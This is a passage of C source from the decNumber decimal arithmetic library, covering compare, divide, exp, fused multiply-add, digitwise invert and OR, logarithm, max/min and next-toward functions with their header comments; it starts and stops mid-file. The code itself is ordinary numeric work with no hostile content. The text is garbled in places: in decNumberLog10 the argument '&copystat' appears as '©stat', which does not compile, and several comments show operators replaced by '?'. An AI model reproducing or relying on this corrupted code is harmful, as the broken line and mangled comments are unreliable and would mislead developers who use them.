/* decNumberAnd */ /* ------------------------------------------------------------------ */ /* decNumberCompare -- compare two Numbers */ /* */ /* This computes C = A ? B */ /* */ /* res is C, the result. C may be A and/or B (e.g., X=X?X) */ /* lhs is A */ /* rhs is B */ /* set is the context */ /* */ /* C must have space for one digit (or NaN). */ /* ------------------------------------------------------------------ */ decNumber * decNumberCompare(decNumber *res, const decNumber *lhs, const decNumber *rhs, decContext *set) { uInt status=0; /* accumulator */ decCompareOp(res, lhs, rhs, set, COMPARE, &status); if (status!=0) decStatus(res, status, set); return res; } /* decNumberCompare */ /* ------------------------------------------------------------------ */ /* decNumberCompareSignal -- compare, signalling on all NaNs */ /* */ /* This computes C = A ? B */ /* */ /* res is C, the result. C may be A and/or B (e.g., X=X?X) */ /* lhs is A */ /* rhs is B */ /* set is the context */ /* */ /* C must have space for one digit (or NaN). */ /* ------------------------------------------------------------------ */ decNumber * decNumberCompareSignal(decNumber *res, const decNumber *lhs, const decNumber *rhs, decContext *set) { uInt status=0; /* accumulator */ decCompareOp(res, lhs, rhs, set, COMPSIG, &status); if (status!=0) decStatus(res, status, set); return res; } /* decNumberCompareSignal */ /* ------------------------------------------------------------------ */ /* decNumberCompareTotal -- compare two Numbers, using total ordering */ /* */ /* This computes C = A ? B, under total ordering */ /* */ /* res is C, the result. C may be A and/or B (e.g., X=X?X) */ /* lhs is A */ /* rhs is B */ /* set is the context */ /* */ /* C must have space for one digit; the result will always be one of */ /* -1, 0, or 1. */ /* ------------------------------------------------------------------ */ decNumber * decNumberCompareTotal(decNumber *res, const decNumber *lhs, const decNumber *rhs, decContext *set) { uInt status=0; /* accumulator */ decCompareOp(res, lhs, rhs, set, COMPTOTAL, &status); if (status!=0) decStatus(res, status, set); return res; } /* decNumberCompareTotal */ /* ------------------------------------------------------------------ */ /* decNumberCompareTotalMag -- compare, total ordering of magnitudes */ /* */ /* This computes C = |A| ? |B|, under total ordering */ /* */ /* res is C, the result. C may be A and/or B (e.g., X=X?X) */ /* lhs is A */ /* rhs is B */ /* set is the context */ /* */ /* C must have space for one digit; the result will always be one of */ /* -1, 0, or 1. */ /* ------------------------------------------------------------------ */ decNumber * decNumberCompareTotalMag(decNumber *res, const decNumber *lhs, const decNumber *rhs, decContext *set) { uInt status=0; /* accumulator */ uInt needbytes; /* for space calculations */ decNumber bufa[D2N(DECBUFFER+1)];/* +1 in case DECBUFFER=0 */ decNumber *allocbufa=NULL; /* -> allocated bufa, iff allocated */ decNumber bufb[D2N(DECBUFFER+1)]; decNumber *allocbufb=NULL; /* -> allocated bufb, iff allocated */ decNumber *a, *b; /* temporary pointers */ #if DECCHECK if (decCheckOperands(res, lhs, rhs, set)) return res; #endif do { /* protect allocated storage */ /* if either is negative, take a copy and absolute */ if (decNumberIsNegative(lhs)) { /* lhs<0 */ a=bufa; needbytes=sizeof(decNumber)+(D2U(lhs->digits)-1)*sizeof(Unit); if (needbytes>sizeof(bufa)) { /* need malloc space */ allocbufa=(decNumber *)malloc(needbytes); if (allocbufa==NULL) { /* hopeless -- abandon */ status|=DEC_Insufficient_storage; break;} a=allocbufa; /* use the allocated space */ } decNumberCopy(a, lhs); /* copy content */ a->bits&=~DECNEG; /* .. and clear the sign */ lhs=a; /* use copy from here on */ } if (decNumberIsNegative(rhs)) { /* rhs<0 */ b=bufb; needbytes=sizeof(decNumber)+(D2U(rhs->digits)-1)*sizeof(Unit); if (needbytes>sizeof(bufb)) { /* need malloc space */ allocbufb=(decNumber *)malloc(needbytes); if (allocbufb==NULL) { /* hopeless -- abandon */ status|=DEC_Insufficient_storage; break;} b=allocbufb; /* use the allocated space */ } decNumberCopy(b, rhs); /* copy content */ b->bits&=~DECNEG; /* .. and clear the sign */ rhs=b; /* use copy from here on */ } decCompareOp(res, lhs, rhs, set, COMPTOTAL, &status); } while(0); /* end protected */ if (allocbufa!=NULL) free(allocbufa); /* drop any storage used */ if (allocbufb!=NULL) free(allocbufb); /* .. */ if (status!=0) decStatus(res, status, set); return res; } /* decNumberCompareTotalMag */ /* ------------------------------------------------------------------ */ /* decNumberDivide -- divide one number by another */ /* */ /* This computes C = A / B */ /* */ /* res is C, the result. C may be A and/or B (e.g., X=X/X) */ /* lhs is A */ /* rhs is B */ /* set is the context */ /* */ /* C must have space for set->digits digits. */ /* ------------------------------------------------------------------ */ decNumber * decNumberDivide(decNumber *res, const decNumber *lhs, const decNumber *rhs, decContext *set) { uInt status=0; /* accumulator */ decDivideOp(res, lhs, rhs, set, DIVIDE, &status); if (status!=0) decStatus(res, status, set); #if DECCHECK decCheckInexact(res, set); #endif return res; } /* decNumberDivide */ /* ------------------------------------------------------------------ */ /* decNumberDivideInteger -- divide and return integer quotient */ /* */ /* This computes C = A # B, where # is the integer divide operator */ /* */ /* res is C, the result. C may be A and/or B (e.g., X=X#X) */ /* lhs is A */ /* rhs is B */ /* set is the context */ /* */ /* C must have space for set->digits digits. */ /* ------------------------------------------------------------------ */ decNumber * decNumberDivideInteger(decNumber *res, const decNumber *lhs, const decNumber *rhs, decContext *set) { uInt status=0; /* accumulator */ decDivideOp(res, lhs, rhs, set, DIVIDEINT, &status); if (status!=0) decStatus(res, status, set); return res; } /* decNumberDivideInteger */ /* ------------------------------------------------------------------ */ /* decNumberExp -- exponentiation */ /* */ /* This computes C = exp(A) */ /* */ /* res is C, the result. C may be A */ /* rhs is A */ /* set is the context; note that rounding mode has no effect */ /* */ /* C must have space for set->digits digits. */ /* */ /* Mathematical function restrictions apply (see above); a NaN is */ /* returned with Invalid_operation if a restriction is violated. */ /* */ /* Finite results will always be full precision and Inexact, except */ /* when A is a zero or -Infinity (giving 1 or 0 respectively). */ /* */ /* An Inexact result is rounded using DEC_ROUND_HALF_EVEN; it will */ /* almost always be correctly rounded, but may be up to 1 ulp in */ /* error in rare cases. */ /* ------------------------------------------------------------------ */ /* This is a wrapper for decExpOp which can handle the slightly wider */ /* (double) range needed by Ln (which has to be able to calculate */ /* exp(-a) where a can be the tiniest number (Ntiny). */ /* ------------------------------------------------------------------ */ decNumber * decNumberExp(decNumber *res, const decNumber *rhs, decContext *set) { uInt status=0; /* accumulator */ #if DECSUBSET decNumber *allocrhs=NULL; /* non-NULL if rounded rhs allocated */ #endif #if DECCHECK if (decCheckOperands(res, DECUNUSED, rhs, set)) return res; #endif /* Check restrictions; these restrictions ensure that if h=8 (see */ /* decExpOp) then the result will either overflow or underflow to 0. */ /* Other math functions restrict the input range, too, for inverses. */ /* If not violated then carry out the operation. */ if (!decCheckMath(rhs, set, &status)) do { /* protect allocation */ #if DECSUBSET if (!set->extended) { /* reduce operand and set lostDigits status, as needed */ if (rhs->digits>set->digits) { allocrhs=decRoundOperand(rhs, set, &status); if (allocrhs==NULL) break; rhs=allocrhs; } } #endif decExpOp(res, rhs, set, &status); } while(0); /* end protected */ #if DECSUBSET if (allocrhs !=NULL) free(allocrhs); /* drop any storage used */ #endif /* apply significant status */ if (status!=0) decStatus(res, status, set); #if DECCHECK decCheckInexact(res, set); #endif return res; } /* decNumberExp */ /* ------------------------------------------------------------------ */ /* decNumberFMA -- fused multiply add */ /* */ /* This computes D = (A * B) + C with only one rounding */ /* */ /* res is D, the result. D may be A or B or C (e.g., X=FMA(X,X,X)) */ /* lhs is A */ /* rhs is B */ /* fhs is C [far hand side] */ /* set is the context */ /* */ /* Mathematical function restrictions apply (see above); a NaN is */ /* returned with Invalid_operation if a restriction is violated. */ /* */ /* C must have space for set->digits digits. */ /* ------------------------------------------------------------------ */ decNumber * decNumberFMA(decNumber *res, const decNumber *lhs, const decNumber *rhs, const decNumber *fhs, decContext *set) { uInt status=0; /* accumulator */ decContext dcmul; /* context for the multiplication */ uInt needbytes; /* for space calculations */ decNumber bufa[D2N(DECBUFFER*2+1)]; decNumber *allocbufa=NULL; /* -> allocated bufa, iff allocated */ decNumber *acc; /* accumulator pointer */ decNumber dzero; /* work */ #if DECCHECK if (decCheckOperands(res, lhs, rhs, set)) return res; if (decCheckOperands(res, fhs, DECUNUSED, set)) return res; #endif do { /* protect allocated storage */ #if DECSUBSET if (!set->extended) { /* [undefined if subset] */ status|=DEC_Invalid_operation; break;} #endif /* Check math restrictions [these ensure no overflow or underflow] */ if ((!decNumberIsSpecial(lhs) && decCheckMath(lhs, set, &status)) || (!decNumberIsSpecial(rhs) && decCheckMath(rhs, set, &status)) || (!decNumberIsSpecial(fhs) && decCheckMath(fhs, set, &status))) break; /* set up context for multiply */ dcmul=*set; dcmul.digits=lhs->digits+rhs->digits; /* just enough */ /* [The above may be an over-estimate for subset arithmetic, but that's OK] */ dcmul.emax=DEC_MAX_EMAX; /* effectively unbounded .. */ dcmul.emin=DEC_MIN_EMIN; /* [thanks to Math restrictions] */ /* set up decNumber space to receive the result of the multiply */ acc=bufa; /* may fit */ needbytes=sizeof(decNumber)+(D2U(dcmul.digits)-1)*sizeof(Unit); if (needbytes>sizeof(bufa)) { /* need malloc space */ allocbufa=(decNumber *)malloc(needbytes); if (allocbufa==NULL) { /* hopeless -- abandon */ status|=DEC_Insufficient_storage; break;} acc=allocbufa; /* use the allocated space */ } /* multiply with extended range and necessary precision */ /*printf("emin=%ld\n", dcmul.emin); */ decMultiplyOp(acc, lhs, rhs, &dcmul, &status); /* Only Invalid operation (from sNaN or Inf * 0) is possible in */ /* status; if either is seen than ignore fhs (in case it is */ /* another sNaN) and set acc to NaN unless we had an sNaN */ /* [decMultiplyOp leaves that to caller] */ /* Note sNaN has to go through addOp to shorten payload if */ /* necessary */ if ((status&DEC_Invalid_operation)!=0) { if (!(status&DEC_sNaN)) { /* but be true invalid */ decNumberZero(res); /* acc not yet set */ res->bits=DECNAN; break; } decNumberZero(&dzero); /* make 0 (any non-NaN would do) */ fhs=&dzero; /* use that */ } #if DECCHECK else { /* multiply was OK */ if (status!=0) printf("Status=%08lx after FMA multiply\n", status); } #endif /* add the third operand and result -> res, and all is done */ decAddOp(res, acc, fhs, set, 0, &status); } while(0); /* end protected */ if (allocbufa!=NULL) free(allocbufa); /* drop any storage used */ if (status!=0) decStatus(res, status, set); #if DECCHECK decCheckInexact(res, set); #endif return res; } /* decNumberFMA */ /* ------------------------------------------------------------------ */ /* decNumberInvert -- invert a Number, digitwise */ /* */ /* This computes C = ~A */ /* */ /* res is C, the result. C may be A (e.g., X=~X) */ /* rhs is A */ /* set is the context (used for result length and error report) */ /* */ /* C must have space for set->digits digits. */ /* */ /* Logical function restrictions apply (see above); a NaN is */ /* returned with Invalid_operation if a restriction is violated. */ /* ------------------------------------------------------------------ */ decNumber * decNumberInvert(decNumber *res, const decNumber *rhs, decContext *set) { const Unit *ua, *msua; /* -> operand and its msu */ Unit *uc, *msuc; /* -> result and its msu */ Int msudigs; /* digits in res msu */ #if DECCHECK if (decCheckOperands(res, DECUNUSED, rhs, set)) return res; #endif if (rhs->exponent!=0 || decNumberIsSpecial(rhs) || decNumberIsNegative(rhs)) { decStatus(res, DEC_Invalid_operation, set); return res; } /* operand is valid */ ua=rhs->lsu; /* bottom-up */ uc=res->lsu; /* .. */ msua=ua+D2U(rhs->digits)-1; /* -> msu of rhs */ msuc=uc+D2U(set->digits)-1; /* -> msu of result */ msudigs=MSUDIGITS(set->digits); /* [faster than remainder] */ for (; uc<=msuc; ua++, uc++) { /* Unit loop */ Unit a; /* extract unit */ Int i, j; /* work */ if (ua>msua) a=0; else a=*ua; *uc=0; /* can now write back */ /* always need to examine all bits in rhs */ /* This loop could be unrolled and/or use BIN2BCD tables */ for (i=0; i<DECDPUN; i++) { if ((~a)&1) *uc=*uc+(Unit)powers[i]; /* effect INVERT */ j=a%10; a=a/10; if (j>1) { decStatus(res, DEC_Invalid_operation, set); return res; } if (uc==msuc && i==msudigs-1) break; /* just did final digit */ } /* each digit */ } /* each unit */ /* [here uc-1 is the msu of the result] */ res->digits=decGetDigits(res->lsu, uc-res->lsu); res->exponent=0; /* integer */ res->bits=0; /* sign=0 */ return res; /* [no status to set] */ } /* decNumberInvert */ /* ------------------------------------------------------------------ */ /* decNumberLn -- natural logarithm */ /* */ /* This computes C = ln(A) */ /* */ /* res is C, the result. C may be A */ /* rhs is A */ /* set is the context; note that rounding mode has no effect */ /* */ /* C must have space for set->digits digits. */ /* */ /* Notable cases: */ /* A<0 -> Invalid */ /* A=0 -> -Infinity (Exact) */ /* A=+Infinity -> +Infinity (Exact) */ /* A=1 exactly -> 0 (Exact) */ /* */ /* Mathematical function restrictions apply (see above); a NaN is */ /* returned with Invalid_operation if a restriction is violated. */ /* */ /* An Inexact result is rounded using DEC_ROUND_HALF_EVEN; it will */ /* almost always be correctly rounded, but may be up to 1 ulp in */ /* error in rare cases. */ /* ------------------------------------------------------------------ */ /* This is a wrapper for decLnOp which can handle the slightly wider */ /* (+11) range needed by Ln, Log10, etc. (which may have to be able */ /* to calculate at p+e+2). */ /* ------------------------------------------------------------------ */ decNumber * decNumberLn(decNumber *res, const decNumber *rhs, decContext *set) { uInt status=0; /* accumulator */ #if DECSUBSET decNumber *allocrhs=NULL; /* non-NULL if rounded rhs allocated */ #endif #if DECCHECK if (decCheckOperands(res, DECUNUSED, rhs, set)) return res; #endif /* Check restrictions; this is a math function; if not violated */ /* then carry out the operation. */ if (!decCheckMath(rhs, set, &status)) do { /* protect allocation */ #if DECSUBSET if (!set->extended) { /* reduce operand and set lostDigits status, as needed */ if (rhs->digits>set->digits) { allocrhs=decRoundOperand(rhs, set, &status); if (allocrhs==NULL) break; rhs=allocrhs; } /* special check in subset for rhs=0 */ if (ISZERO(rhs)) { /* +/- zeros -> error */ status|=DEC_Invalid_operation; break;} } /* extended=0 */ #endif decLnOp(res, rhs, set, &status); } while(0); /* end protected */ #if DECSUBSET if (allocrhs !=NULL) free(allocrhs); /* drop any storage used */ #endif /* apply significant status */ if (status!=0) decStatus(res, status, set); #if DECCHECK decCheckInexact(res, set); #endif return res; } /* decNumberLn */ /* ------------------------------------------------------------------ */ /* decNumberLogB - get adjusted exponent, by 754r rules */ /* */ /* This computes C = adjustedexponent(A) */ /* */ /* res is C, the result. C may be A */ /* rhs is A */ /* set is the context, used only for digits and status */ /* */ /* C must have space for 10 digits (A might have 10**9 digits and */ /* an exponent of +999999999, or one digit and an exponent of */ /* -1999999999). */ /* */ /* This returns the adjusted exponent of A after (in theory) padding */ /* with zeros on the right to set->digits digits while keeping the */ /* same value. The exponent is not limited by emin/emax. */ /* */ /* Notable cases: */ /* A<0 -> Use |A| */ /* A=0 -> -Infinity (Division by zero) */ /* A=Infinite -> +Infinity (Exact) */ /* A=1 exactly -> 0 (Exact) */ /* NaNs are propagated as usual */ /* ------------------------------------------------------------------ */ decNumber * decNumberLogB(decNumber *res, const decNumber *rhs, decContext *set) { uInt status=0; /* accumulator */ #if DECCHECK if (decCheckOperands(res, DECUNUSED, rhs, set)) return res; #endif /* NaNs as usual; Infinities return +Infinity; 0->oops */ if (decNumberIsNaN(rhs)) decNaNs(res, rhs, NULL, set, &status); else if (decNumberIsInfinite(rhs)) decNumberCopyAbs(res, rhs); else if (decNumberIsZero(rhs)) { decNumberZero(res); /* prepare for Infinity */ res->bits=DECNEG|DECINF; /* -Infinity */ status|=DEC_Division_by_zero; /* as per 754r */ } else { /* finite non-zero */ Int ae=rhs->exponent+rhs->digits-1; /* adjusted exponent */ decNumberFromInt32(res, ae); /* lay it out */ } if (status!=0) decStatus(res, status, set); return res; } /* decNumberLogB */ /* ------------------------------------------------------------------ */ /* decNumberLog10 -- logarithm in base 10 */ /* */ /* This computes C = log10(A) */ /* */ /* res is C, the result. C may be A */ /* rhs is A */ /* set is the context; note that rounding mode has no effect */ /* */ /* C must have space for set->digits digits. */ /* */ /* Notable cases: */ /* A<0 -> Invalid */ /* A=0 -> -Infinity (Exact) */ /* A=+Infinity -> +Infinity (Exact) */ /* A=10**n (if n is an integer) -> n (Exact) */ /* */ /* Mathematical function restrictions apply (see above); a NaN is */ /* returned with Invalid_operation if a restriction is violated. */ /* */ /* An Inexact result is rounded using DEC_ROUND_HALF_EVEN; it will */ /* almost always be correctly rounded, but may be up to 1 ulp in */ /* error in rare cases. */ /* ------------------------------------------------------------------ */ /* This calculates ln(A)/ln(10) using appropriate precision. For */ /* ln(A) this is the max(p, rhs->digits + t) + 3, where p is the */ /* requested digits and t is the number of digits in the exponent */ /* (maximum 6). For ln(10) it is p + 3; this is often handled by the */ /* fastpath in decLnOp. The final division is done to the requested */ /* precision. */ /* ------------------------------------------------------------------ */ decNumber * decNumberLog10(decNumber *res, const decNumber *rhs, decContext *set) { uInt status=0, ignore=0; /* status accumulators */ uInt needbytes; /* for space calculations */ Int p; /* working precision */ Int t; /* digits in exponent of A */ /* buffers for a and b working decimals */ /* (adjustment calculator, same size) */ decNumber bufa[D2N(DECBUFFER+2)]; decNumber *allocbufa=NULL; /* -> allocated bufa, iff allocated */ decNumber *a=bufa; /* temporary a */ decNumber bufb[D2N(DECBUFFER+2)]; decNumber *allocbufb=NULL; /* -> allocated bufb, iff allocated */ decNumber *b=bufb; /* temporary b */ decNumber bufw[D2N(10)]; /* working 2-10 digit number */ decNumber *w=bufw; /* .. */ #if DECSUBSET decNumber *allocrhs=NULL; /* non-NULL if rounded rhs allocated */ #endif decContext aset; /* working context */ #if DECCHECK if (decCheckOperands(res, DECUNUSED, rhs, set)) return res; #endif /* Check restrictions; this is a math function; if not violated */ /* then carry out the operation. */ if (!decCheckMath(rhs, set, &status)) do { /* protect malloc */ #if DECSUBSET if (!set->extended) { /* reduce operand and set lostDigits status, as needed */ if (rhs->digits>set->digits) { allocrhs=decRoundOperand(rhs, set, &status); if (allocrhs==NULL) break; rhs=allocrhs; } /* special check in subset for rhs=0 */ if (ISZERO(rhs)) { /* +/- zeros -> error */ status|=DEC_Invalid_operation; break;} } /* extended=0 */ #endif decContextDefault(&aset, DEC_INIT_DECIMAL64); /* clean context */ /* handle exact powers of 10; only check if +ve finite */ if (!(rhs->bits&(DECNEG|DECSPECIAL)) && !ISZERO(rhs)) { Int residue=0; /* (no residue) */ uInt copystat=0; /* clean status */ /* round to a single digit... */ aset.digits=1; decCopyFit(w, rhs, &aset, &residue, ©stat); /* copy & shorten */ /* if exact and the digit is 1, rhs is a power of 10 */ if (!(copystat&DEC_Inexact) && w->lsu[0]==1) { /* the exponent, conveniently, is the power of 10; making */ /* this the result needs a little care as it might not fit, */ /* so first convert it into the working number, and then move */ /* to res */ decNumberFromInt32(w, w->exponent); residue=0; decCopyFit(res, w, set, &residue, &status); /* copy & round */ decFinish(res, set, &residue, &status); /* cleanup/set flags */ break; } /* not a power of 10 */ } /* not a candidate for exact */ /* simplify the information-content calculation to use 'total */ /* number of digits in a, including exponent' as compared to the */ /* requested digits, as increasing this will only rarely cost an */ /* iteration in ln(a) anyway */ t=6; /* it can never be >6 */ /* allocate space when needed... */ p=(rhs->digits+t>set->digits?rhs->digits+t:set->digits)+3; needbytes=sizeof(decNumber)+(D2U(p)-1)*sizeof(Unit); if (needbytes>sizeof(bufa)) { /* need malloc space */ allocbufa=(decNumber *)malloc(needbytes); if (allocbufa==NULL) { /* hopeless -- abandon */ status|=DEC_Insufficient_storage; break;} a=allocbufa; /* use the allocated space */ } aset.digits=p; /* as calculated */ aset.emax=DEC_MAX_MATH; /* usual bounds */ aset.emin=-DEC_MAX_MATH; /* .. */ aset.clamp=0; /* and no concrete format */ decLnOp(a, rhs, &aset, &status); /* a=ln(rhs) */ /* skip the division if the result so far is infinite, NaN, or */ /* zero, or there was an error; note NaN from sNaN needs copy */ if (status&DEC_NaNs && !(status&DEC_sNaN)) break; if (a->bits&DECSPECIAL || ISZERO(a)) { decNumberCopy(res, a); /* [will fit] */ break;} /* for ln(10) an extra 3 digits of precision are needed */ p=set->digits+3; needbytes=sizeof(decNumber)+(D2U(p)-1)*sizeof(Unit); if (needbytes>sizeof(bufb)) { /* need malloc space */ allocbufb=(decNumber *)malloc(needbytes); if (allocbufb==NULL) { /* hopeless -- abandon */ status|=DEC_Insufficient_storage; break;} b=allocbufb; /* use the allocated space */ } decNumberZero(w); /* set up 10... */ #if DECDPUN==1 w->lsu[1]=1; w->lsu[0]=0; /* .. */ #else w->lsu[0]=10; /* .. */ #endif w->digits=2; /* .. */ aset.digits=p; decLnOp(b, w, &aset, &ignore); /* b=ln(10) */ aset.digits=set->digits; /* for final divide */ decDivideOp(res, a, b, &aset, DIVIDE, &status); /* into result */ } while(0); /* [for break] */ if (allocbufa!=NULL) free(allocbufa); /* drop any storage used */ if (allocbufb!=NULL) free(allocbufb); /* .. */ #if DECSUBSET if (allocrhs !=NULL) free(allocrhs); /* .. */ #endif /* apply significant status */ if (status!=0) decStatus(res, status, set); #if DECCHECK decCheckInexact(res, set); #endif return res; } /* decNumberLog10 */ /* ------------------------------------------------------------------ */ /* decNumberMax -- compare two Numbers and return the maximum */ /* */ /* This computes C = A ? B, returning the maximum by 754R rules */ /* */ /* res is C, the result. C may be A and/or B (e.g., X=X?X) */ /* lhs is A */ /* rhs is B */ /* set is the context */ /* */ /* C must have space for set->digits digits. */ /* ------------------------------------------------------------------ */ decNumber * decNumberMax(decNumber *res, const decNumber *lhs, const decNumber *rhs, decContext *set) { uInt status=0; /* accumulator */ decCompareOp(res, lhs, rhs, set, COMPMAX, &status); if (status!=0) decStatus(res, status, set); #if DECCHECK decCheckInexact(res, set); #endif return res; } /* decNumberMax */ /* ------------------------------------------------------------------ */ /* decNumberMaxMag -- compare and return the maximum by magnitude */ /* */ /* This computes C = A ? B, returning the maximum by 754R rules */ /* */ /* res is C, the result. C may be A and/or B (e.g., X=X?X) */ /* lhs is A */ /* rhs is B */ /* set is the context */ /* */ /* C must have space for set->digits digits. */ /* ------------------------------------------------------------------ */ decNumber * decNumberMaxMag(decNumber *res, const decNumber *lhs, const decNumber *rhs, decContext *set) { uInt status=0; /* accumulator */ decCompareOp(res, lhs, rhs, set, COMPMAXMAG, &status); if (status!=0) decStatus(res, status, set); #if DECCHECK decCheckInexact(res, set); #endif return res; } /* decNumberMaxMag */ /* ------------------------------------------------------------------ */ /* decNumberMin -- compare two Numbers and return the minimum */ /* */ /* This computes C = A ? B, returning the minimum by 754R rules */ /* */ /* res is C, the result. C may be A and/or B (e.g., X=X?X) */ /* lhs is A */ /* rhs is B */ /* set is the context */ /* */ /* C must have space for set->digits digits. */ /* ------------------------------------------------------------------ */ decNumber * decNumberMin(decNumber *res, const decNumber *lhs, const decNumber *rhs, decContext *set) { uInt status=0; /* accumulator */ decCompareOp(res, lhs, rhs, set, COMPMIN, &status); if (status!=0) decStatus(res, status, set); #if DECCHECK decCheckInexact(res, set); #endif return res; } /* decNumberMin */ /* ------------------------------------------------------------------ */ /* decNumberMinMag -- compare and return the minimum by magnitude */ /* */ /* This computes C = A ? B, returning the minimum by 754R rules */ /* */ /* res is C, the result. C may be A and/or B (e.g., X=X?X) */ /* lhs is A */ /* rhs is B */ /* set is the context */ /* */ /* C must have space for set->digits digits. */ /* ------------------------------------------------------------------ */ decNumber * decNumberMinMag(decNumber *res, const decNumber *lhs, const decNumber *rhs, decContext *set) { uInt status=0; /* accumulator */ decCompareOp(res, lhs, rhs, set, COMPMINMAG, &status); if (status!=0) decStatus(res, status, set); #if DECCHECK decCheckInexact(res, set); #endif return res; } /* decNumberMinMag */ /* ------------------------------------------------------------------ */ /* decNumberMinus -- prefix minus operator */ /* */ /* This computes C = 0 - A */ /* */ /* res is C, the result. C may be A */ /* rhs is A */ /* set is the context */ /* */ /* See also decNumberCopyNegate for a quiet bitwise version of this. */ /* C must have space for set->digits digits. */ /* ------------------------------------------------------------------ */ /* Simply use AddOp for the subtract, which will do the necessary. */ /* ------------------------------------------------------------------ */ decNumber * decNumberMinus(decNumber *res, const decNumber *rhs, decContext *set) { decNumber dzero; uInt status=0; /* accumulator */ #if DECCHECK if (decCheckOperands(res, DECUNUSED, rhs, set)) return res; #endif decNumberZero(&dzero); /* make 0 */ dzero.exponent=rhs->exponent; /* [no coefficient expansion] */ decAddOp(res, &dzero, rhs, set, DECNEG, &status); if (status!=0) decStatus(res, status, set); #if DECCHECK decCheckInexact(res, set); #endif return res; } /* decNumberMinus */ /* ------------------------------------------------------------------ */ /* decNumberNextMinus -- next towards -Infinity */ /* */ /* This computes C = A - infinitesimal, rounded towards -Infinity */ /* */ /* res is C, the result. C may be A */ /* rhs is A */ /* set is the context */ /* */ /* This is a generalization of 754r NextDown. */ /* ------------------------------------------------------------------ */ decNumber * decNumberNextMinus(decNumber *res, const decNumber *rhs, decContext *set) { decNumber dtiny; /* constant */ decContext workset=*set; /* work */ uInt status=0; /* accumulator */ #if DECCHECK if (decCheckOperands(res, DECUNUSED, rhs, set)) return res; #endif /* +Infinity is the special case */ if ((rhs->bits&(DECINF|DECNEG))==DECINF) { decSetMaxValue(res, set); /* is +ve */ /* there is no status to set */ return res; } decNumberZero(&dtiny); /* start with 0 */ dtiny.lsu[0]=1; /* make number that is .. */ dtiny.exponent=DEC_MIN_EMIN-1; /* .. smaller than tiniest */ workset.round=DEC_ROUND_FLOOR; decAddOp(res, rhs, &dtiny, &workset, DECNEG, &status); status&=DEC_Invalid_operation|DEC_sNaN; /* only sNaN Invalid please */ if (status!=0) decStatus(res, status, set); return res; } /* decNumberNextMinus */ /* ------------------------------------------------------------------ */ /* decNumberNextPlus -- next towards +Infinity */ /* */ /* This computes C = A + infinitesimal, rounded towards +Infinity */ /* */ /* res is C, the result. C may be A */ /* rhs is A */ /* set is the context */ /* */ /* This is a generalization of 754r NextUp. */ /* ------------------------------------------------------------------ */ decNumber * decNumberNextPlus(decNumber *res, const decNumber *rhs, decContext *set) { decNumber dtiny; /* constant */ decContext workset=*set; /* work */ uInt status=0; /* accumulator */ #if DECCHECK if (decCheckOperands(res, DECUNUSED, rhs, set)) return res; #endif /* -Infinity is the special case */ if ((rhs->bits&(DECINF|DECNEG))==(DECINF|DECNEG)) { decSetMaxValue(res, set); res->bits=DECNEG; /* negative */ /* there is no status to set */ return res; } decNumberZero(&dtiny); /* start with 0 */ dtiny.lsu[0]=1; /* make number that is .. */ dtiny.exponent=DEC_MIN_EMIN-1; /* .. smaller than tiniest */ workset.round=DEC_ROUND_CEILING; decAddOp(res, rhs, &dtiny, &workset, 0, &status); status&=DEC_Invalid_operation|DEC_sNaN; /* only sNaN Invalid please */ if (status!=0) decStatus(res, status, set); return res; } /* decNumberNextPlus */ /* ------------------------------------------------------------------ */ /* decNumberNextToward -- next towards rhs */ /* */ /* This computes C = A +/- infinitesimal, rounded towards */ /* +/-Infinity in the direction of B, as per 754r nextafter rules */ /* */ /* res is C, the result. C may be A or B. */ /* lhs is A */ /* rhs is B */ /* set is the context */ /* */ /* This is a generalization of 754r NextAfter. */ /* ------------------------------------------------------------------ */ decNumber * decNumberNextToward(decNumber *res, const decNumber *lhs, const decNumber *rhs, decContext *set) { decNumber dtiny; /* constant */ decContext workset=*set; /* work */ Int result; /* .. */ uInt status=0; /* accumulator */ #if DECCHECK if (decCheckOperands(res, lhs, rhs, set)) return res; #endif if (decNumberIsNaN(lhs) || decNumberIsNaN(rhs)) { decNaNs(res, lhs, rhs, set, &status); } else { /* Is numeric, so no chance of sNaN Invalid, etc. */ result=decCompare(lhs, rhs, 0); /* sign matters */ if (result==BADINT) status|=DEC_Insufficient_storage; /* rare */ else { /* valid compare */ if (result==0) decNumberCopySign(res, lhs, rhs); /* easy */ else { /* differ: need NextPlus or NextMinus */ uByte sub; /* add or subtract */ if (result<0) { /* lhs<rhs, do nextplus */ /* -Infinity is the special case */ if ((lhs->bits&(DECINF|DECNEG))==(DECINF|DECNEG)) { decSetMaxValue(res, set); res->bits=DECNEG; /* negative */ return res; /* there is no status to set */ } workset.round=DEC_ROUND_CEILING; sub=0; /* add, please */ } /* plus */ else { /* lhs>rhs, do nextminus */ /* +Infinity is the special case */ if ((lhs->bits&(DECINF|DECNEG))==DECINF) { decSetMaxValue(res, set); return res; /* there is no status to set */ } workset.round=DEC_ROUND_FLOOR; sub=DECNEG; /* subtract, please */ } /* minus */ decNumberZero(&dtiny); /* start with 0 */ dtiny.lsu[0]=1; /* make number that is .. */ dtiny.exponent=DEC_MIN_EMIN-1; /* .. smaller than tiniest */ decAddOp(res, lhs, &dtiny, &workset, sub, &status); /* + or - */ /* turn off exceptions if the result is a normal number */ /* (including Nmin), otherwise let all status through */ if (decNumberIsNormal(res, set)) status=0; } /* unequal */ } /* compare OK */ } /* numeric */ if (status!=0) decStatus(res, status, set); return res; } /* decNumberNextToward */ /* ------------------------------------------------------------------ */ /* decNumberOr -- OR two Numbers, digitwise */ /* */ /* This computes C = A | B */ /* */ /* res is C, the result. C may be A and/or B (e.g., X=X|X) */ /* lhs is A */ /* rhs is B */ /* set is the context (used for result length and error report) */ /* */ /* C must have space for set->digits digits. */ /* */ /* Logical function restrictions apply (see above); a NaN is */ /* returned with Invalid_operation if a restriction is violated. */ /* ------------------------------------------------------------------ */ decNumber * decNumberOr(decNumber *res, const decNumber *lhs, const decNumber *rhs, decContext *set) { const Unit *ua, *ub; /* -> operands */ const Unit *msua, *msub; /* -> operand msus */ Unit *uc, *msuc; /* -> result and its msu */ Int msudigs; /* digits in res msu */ #if DECCHECK if (decCheckOperands(res, lhs, rhs, set)) return res; #endif if (lhs->exponent!=0 || decNumberIsSpecial(lhs) || decNumberIsNegative(lhs) || rhs->exponent!=0 || decNumberIsSpecial(rhs) || decNumberIsNegative(rhs)) { decStatus(res, DEC_Invalid_operation, set); return res; } /* operands are valid */ ua=lhs->lsu; /* bottom-up */ ub=rhs->lsu; /* .. */ uc=res->lsu; /* .. */ msua=ua+D2U(lhs->digits)-1; /* -> msu of lhs */ msub=ub+D2U(rhs->digits)-1; /* -> msu of rhs */ msuc=uc+D2U(set->digits)-1; /* -> msu of result */ 